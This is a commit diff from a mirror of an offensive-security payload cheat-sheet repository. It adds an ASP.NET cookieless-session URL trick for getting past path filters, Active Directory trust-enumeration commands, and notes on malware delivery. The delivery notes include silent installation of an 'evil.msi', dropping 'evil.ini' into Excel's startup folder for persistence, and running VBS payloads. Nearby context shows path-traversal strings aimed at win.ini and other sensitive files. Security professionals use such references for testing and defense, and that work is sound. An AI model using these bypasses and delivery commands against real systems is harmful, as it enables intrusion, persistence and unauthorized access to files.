mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
ASPNET Cookieless Bypass
This commit is contained in:
parent
e879ca42a3
commit
7752ff806f
@ -13,6 +13,7 @@
|
||||
* [Double URL encoding](#double-url-encoding)
|
||||
* [UNC Bypass](#unc-bypass)
|
||||
* [NGINX/ALB Bypass](#nginxalb-bypass)
|
||||
* [ASPNET Cookieless Bypass](#aspnet-cookieless-bypass)
|
||||
* [Path Traversal](#path-traversal)
|
||||
* [Interesting Linux files](#interesting-linux-files)
|
||||
* [Interesting Windows files](#interesting-windows-files)
|
||||
@ -72,6 +73,7 @@ Sometimes you encounter a WAF which remove the "../" characters from the strings
|
||||
http://domain.tld/page.jsp?include=..;/..;/sensitive.txt
|
||||
```
|
||||
|
||||
|
||||
### Double URL encoding
|
||||
|
||||
```powershell
|
||||
@ -82,6 +84,7 @@ http://domain.tld/page.jsp?include=..;/..;/sensitive.txt
|
||||
|
||||
**e.g:** Spring MVC Directory Traversal Vulnerability (CVE-2018-1271) with `http://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini`
|
||||
|
||||
|
||||
### UNC Bypass
|
||||
|
||||
An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file.
|
||||
@ -90,6 +93,7 @@ An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software
|
||||
\\localhost\c$\windows\win.ini
|
||||
```
|
||||
|
||||
|
||||
### NGINX/ALB Bypass
|
||||
|
||||
NGINX in certain configurations and ALB can block traversal attacks in the route, For example:
|
||||
@ -99,6 +103,21 @@ To bypass this behaviour just add forward slashes in front of the url:
|
||||
```http://nginx-server////////../../```
|
||||
|
||||
|
||||
### ASPNET Cookieless Bypass
|
||||
|
||||
When cookieless session state is enabled. Instead of relying on a cookie to identify the session, ASP.NET modifies the URL by embedding the Session ID directly into it.
|
||||
|
||||
For example, a typical URL might be transformed from: `http://example.com/page.aspx` to something like: `http://example.com/(S(lit3py55t21z5v55vlm25s55))/page.aspx`. The value within `(S(...))` is the Session ID.
|
||||
|
||||
We can use this behavior to bypass filtered URLs.
|
||||
|
||||
```powershell
|
||||
/admin/(S(X))/main.aspx
|
||||
/admin/Foobar/(S(X))/../(S(X))/main.aspx
|
||||
/(S(X))/admin/(S(X))/main.aspx
|
||||
```
|
||||
|
||||
|
||||
### Java Bypass
|
||||
|
||||
Bypass Java's URL protocol
|
||||
@ -210,3 +229,4 @@ The following log files are controllable and can be included with an evil payloa
|
||||
* [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)
|
||||
* [NGINX may be protecting your applications from traversal attacks without you even knowing](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d?source=friends_link&sk=e9ddbadd61576f941be97e111e953381)
|
||||
* [Directory traversal - Portswigger](https://portswigger.net/web-security/file-path-traversal)
|
||||
* [Cookieless ASPNET - Soroush Dalili](https://twitter.com/irsdl/status/1640390106312835072)
|
@ -3422,19 +3422,22 @@ $obj.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$nul
|
||||
|
||||
### Enumerate trusts between domains
|
||||
|
||||
```powershell
|
||||
nltest /trusted_domains
|
||||
```
|
||||
* Native `nltest`
|
||||
```powershell
|
||||
nltest /trusted_domains
|
||||
```
|
||||
* PowerShell `GetAllTrustRelationships`
|
||||
```powershell
|
||||
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
|
||||
|
||||
or
|
||||
|
||||
```powershell
|
||||
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
|
||||
|
||||
SourceName TargetName TrustType TrustDirection
|
||||
---------- ---------- --------- --------------
|
||||
domainA.local domainB.local TreeRoot Bidirectional
|
||||
```
|
||||
SourceName TargetName TrustType TrustDirection
|
||||
---------- ---------- --------- --------------
|
||||
domainA.local domainB.local TreeRoot Bidirectional
|
||||
```
|
||||
* Crackmapexec module `enum_trusts`
|
||||
```powershell
|
||||
cme ldap <ip> -u <user> -p <pass> -M enum_trusts
|
||||
```
|
||||
|
||||
### Exploit trusts between domains
|
||||
|
||||
|
@ -5,7 +5,8 @@
|
||||
## Summary
|
||||
|
||||
* [Complex Chains](#complex-chains)
|
||||
* [Payloads](#payloads)
|
||||
* [Container](#container)
|
||||
* [Payload](#payload)
|
||||
* [Binary Files](#binary-files)
|
||||
* [Code Execution Files](#code-execution-files)
|
||||
* [Embedded Files](#embedded-files)
|
||||
@ -29,8 +30,31 @@
|
||||
* **DECOY**: used to continue pretext narration after detonating malware
|
||||
* Typically open PDF files
|
||||
|
||||
Examples:
|
||||
* HTML SMUGGLING(PASSWORD PROTECTED ZIP + ISO(LNK + IcedID + PNG)) used by [TA551/Storm-0303](https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/)
|
||||
|
||||
## Payloads
|
||||
|
||||
## Container
|
||||
|
||||
* **ISO/IMG** - can contain hidden files, gets **automounted** giving easy access to contained files (`powershell –c .\malware.exe`)
|
||||
* **ZIP** - can contain hidden files (locate ZIP + unpack it + change dir + run Malware)
|
||||
* **WIM** - Windows Image, builtin format used to deploy system features
|
||||
```ps1
|
||||
# Mount/Unmount .WIM
|
||||
PS> Mount-WindowsImage -ImagePath myarchive.wim -Path "C:\output\path\to\extract" -Index 1
|
||||
PS> Dismount-WindowsImage -Path "C:\output\path\to\extract" -Discard
|
||||
```
|
||||
* **7-zip, RAR, GZ** - should get a native support on Windows 11
|
||||
|
||||
|
||||
## Trigger
|
||||
|
||||
* **LNK**
|
||||
* **CHM**
|
||||
* **ClickOnce**
|
||||
|
||||
|
||||
## Payload
|
||||
|
||||
### Binary Files
|
||||
|
||||
@ -106,10 +130,23 @@ These files can be executed directly on the system without any third party.
|
||||
* Word with Macro (.doc, .docm)
|
||||
* Excel library (.xll)
|
||||
* Excel macro-enabled add-in file (.xlam)
|
||||
```ps1
|
||||
xcopy /Q/R/S/Y/H/G/I evil.ini %APPDATA%\Microsoft\Excel\XLSTART
|
||||
```
|
||||
* WSF files (.wsf)
|
||||
* MSI installers (.msi)
|
||||
```ps1
|
||||
powershell Unblock-File evil.msi; msiexec /q /i .\evil.msi
|
||||
```
|
||||
* MSIX/APPX app package (.msix, .appx)
|
||||
* ClickOnce (.application, .vsto)
|
||||
* ClickOnce (.application, .vsto, .appref-ms)
|
||||
* Powershell scripts (.ps1)
|
||||
* Windows Script Host scripts (.wsh, .vbs)
|
||||
```ps1
|
||||
cscript.exe payload.vbs
|
||||
wscript payload.vbs
|
||||
wscript /e:VBScript payload.txt
|
||||
```
|
||||
|
||||
|
||||
### Embedded Files
|
||||
@ -148,5 +185,6 @@ In 2022, LAPSUS$ claimed responsibility for a cyberattack on NVIDIA, a major gra
|
||||
|
||||
* [Top 10 Payloads: Highlighting Notable and Trending Techniques - delivr.to](https://blog.delivr.to/delivr-tos-top-10-payloads-highlighting-notable-and-trending-techniques-fb5e9fdd9356)
|
||||
* [Executing Code as a Control Panel Item through an Exported Cplapplet Function - @spotheplanet](https://www.ired.team/offensive-security/code-execution/executing-code-in-control-panel-item-through-an-exported-cplapplet-function)
|
||||
* [02. Desperate Infection Chains - Multi-Step Initial Access Strategies by Mariusz Banach](https://youtu.be/CwNPP_Xfrts)
|
||||
* [Desperate Infection Chains - Multi-Step Initial Access Strategies by Mariusz Banach - x33fcon Youtube](https://youtu.be/CwNPP_Xfrts)
|
||||
* [Desperate Infection Chains - Multi-Step Initial Access Strategies by Mariusz Banach - x33fcon PDF](https://binary-offensive.com/files/x33fcon%20-%20Desperate%20Infection%20Chains.pdf)
|
||||
* [Red Macros Factory - https://binary-offensive.com/](https://binary-offensive.com/initial-access-framework)
|
Loading…
Reference in New Issue
Block a user